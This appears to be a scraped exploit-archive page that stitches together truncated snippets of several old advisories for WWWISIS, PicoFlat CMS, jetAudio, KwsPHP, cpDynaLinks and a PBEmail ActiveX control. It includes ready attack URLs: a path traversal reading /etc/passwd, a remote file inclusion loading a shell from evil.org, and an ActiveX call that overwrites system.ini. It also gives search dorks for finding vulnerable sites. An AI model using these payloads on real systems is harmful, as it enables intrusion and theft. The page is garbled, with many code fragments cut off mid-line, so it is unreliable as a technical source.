Category: 0day exploits

# WWWISIS (Search) Multiple Vulnerabilities
# Download:
# http://bvsmodelo.bvsalud.org/php/level.php?lang=en&component=31&item=2
# Bug found by JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# d0rk: powered by WWWISIS
#Stop lammer

# Local File Disclosure Vulnerability:

http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file]
http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd

# Exploit In (XSS):

http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article^dlibrary&fmt=iso.pft&lang=i
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base=article^dlibrary&fmt=iso.pft&lang=e
….

[ i,e ... ] it is the language of script

# Cross Siting …

/* extremail-v4.c
*
* Copyright (c) 2006 by
*
* eXtremail …

#!/usr/bin/perl
# TikiWiki …

#PicoFlat CMS Remote file inclusion
#f0und bY 0in
#download:http://sourceforge.net/project/showfiles.php?group_id=195156&package_id=230351&release_id=533796
#Greetings to:Dark-coders team members: Die-angel,Slim,Umbro
#Others: Joker186,Kaja,Wojto111,Rade0n
#And funny n00b-firends: Pucik and Steryd ;]
FUN BUG in index.php:
83: if (isset($_GET['pagina'])) { $pagina = $_GET['pagina']; }else{ $pagina = “news_publisher.php”; }

107:

EXPLOIT:
http://x.com/index.php?pagina=http://evil.org/shell.txt?

[2007-10-11]

#!/usr/bin/python
# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
# Shellcode: Windows Execute Command (calc)
# Just for fun
##

from struct import …

…

##################################################
# Script………………………………: KwsPHP ver 1.0 Newsletter Module
# Script Site………………………: http://www.kwsphp.org
# Vulnerability……………………: Remote SQL injection Exploit
# Access…………………………….: Remote
# level………………………………..: Dangerous
# Author…………………………….: S4mi
# Contact……………………………: S4mi[at]LinuxMail.org
##################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 …..
#
##################################################
#This Exploit Only When magic_quotes_gpc Is OFF
#Vuln Files:
#\modules\newsletter\index.php
# …

\\\|///
\\ - - // Xmors Underground Group
…

#!/usr/bin/perl

# cpDynaLinks 1.02 Remote Sql Inyection exploit
# download:
# http://www.cplinks.com/download/cpdynalinks/cpdynalinks_version_1_02_full.zip
# bug found by s0cratex
# exploit written by ka0x
# D.O.M TEAM 2007
# d0rk: Powered by cpDynaLinks
# need magic_quotes_gpc off

# contact:

# ka0x@domlabs:~# perl cpdynalinks.pl http://127.0.0.1/
#
# [ ] connecting in http://127.0.0.1/…
# [!] …

Found by: Katatafish (karatatata{at}hush{dot}com)
software:PBEmail 7 ActiveX Edition
Vendor: http://www.perfectionbytes.com
vulnerability: Insecure method
SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll
Tested on Internet explorer 7 with Windows XP SP 2.
Thanks: str0ke

kat.SaveSenderToXml “C:\WINDOWS\system.ini”
MyMsg = MsgBox (”Done! Your C:\WINDOWS\system.ini file should now …